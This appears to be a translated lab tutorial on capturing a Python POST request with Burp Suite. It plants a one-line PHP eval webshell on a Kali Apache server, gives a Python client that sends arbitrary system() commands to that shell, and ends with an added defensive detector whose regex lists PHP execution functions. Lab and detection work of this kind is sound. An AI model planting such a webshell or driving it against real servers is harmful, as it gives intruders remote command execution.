
Use Burp Suite to capture a POST request sent by Python

Editor: Python

Contents

      • Prepare the web environment
      • Test code
      • Test result
      • Capture the request with Burp Suite

Prepare the web environment

Kali already ships with Apache (running ls under /etc shows it), so it only needs to be configured. (Any other Linux or Windows virtual machine also works here.)

Commands for managing the Apache service:

/etc/init.d/apache2 start (start)
/etc/init.d/apache2 restart (restart)
/etc/init.d/apache2 status (check the status)


Entering Kali's IP address on Kali itself shows that Apache has been started.

Write a one-line webshell (a "one-sentence Trojan") into the web root directory on Kali. A PHP webshell is used here.

<?php @eval($_POST['shell']);?>

The shell variable receives the string sent by the Python code.
The eval() function executes the received string as PHP code.

Test code

import requests

url = input('Target URL: ')
passwd = input('Connection password: ')  # This is actually the POST variable in the webshell (shell)
cmd = input('Command to run: ')
# Pass the command to the one-line webshell
payload = {
    passwd: "system('" + cmd + "');"
}
# Send the POST request to the target URL
response = requests.post(url=url, data=payload, timeout=3)
# Print the output of the executed command
print(response.text)

Test result



Capture the request with Burp Suite


import requests

url = input('Target URL: ')
passwd = input('Connection password: ')  # This is actually the POST variable in the webshell (shell)
cmd = input('Command to run: ')
# Pass the command to the one-line webshell
payload = {
    passwd: "system('" + cmd + "');"
}
# Route the request through Burp Suite's proxy listener so it can capture Python's POST request
proxy = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}
# Send the POST request to the target URL
response = requests.post(url=url, data=payload, proxies=proxy, timeout=3)
# Print the output of the executed command
print(response.text)

Turn on interception in Burp Suite, then run the Python code.


Replay this POST request.


Decode the request body with Burp Suite's built-in tool.


After decoding, the result is as follows.


Changing the ls command to ifconfig gives the following result.
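
From the defender's side, the decoded request body is what gives this traffic away. The following added example (not part of the original article) URL-decodes form-encoded POST bodies, as the decoding step above does, and flags fields whose value calls a PHP execution function; the name suspicious_fields, the function list and the sample bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# PHP functions that run OS commands or evaluate code. A form field whose
# decoded value calls one of them is typical of traffic to an eval() webshell.
# The list is an assumption for this example, not an exhaustive signature set.
PHP_EXEC_CALL = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(",
    re.IGNORECASE,
)


def suspicious_fields(raw_body):
    """Return (field, decoded_value) pairs whose value looks like PHP code."""
    hits = []
    # parse_qsl applies the same URL decoding as the manual decode step.
    for field, value in parse_qsl(raw_body, keep_blank_values=True):
        if PHP_EXEC_CALL.search(value):
            hits.append((field, value))
    return hits


# Constructed sample bodies: the first two are what the client above puts on
# the wire for "ls" and "ifconfig"; the third is an ordinary form submission.
SAMPLE_BODIES = [
    "shell=system%28%27ls%27%29%3B",
    "shell=system%28%27ifconfig%27%29%3B",
    "user=alice&comment=my+system+is+down",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        for field, value in suspicious_fields(body):
            print(f"ALERT field={field!r} decoded={value!r}")
```

The same check can run over request bodies logged by a reverse proxy or WAF; matching on the decoded value avoids missing the call when the parentheses and quotes are percent-encoded.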


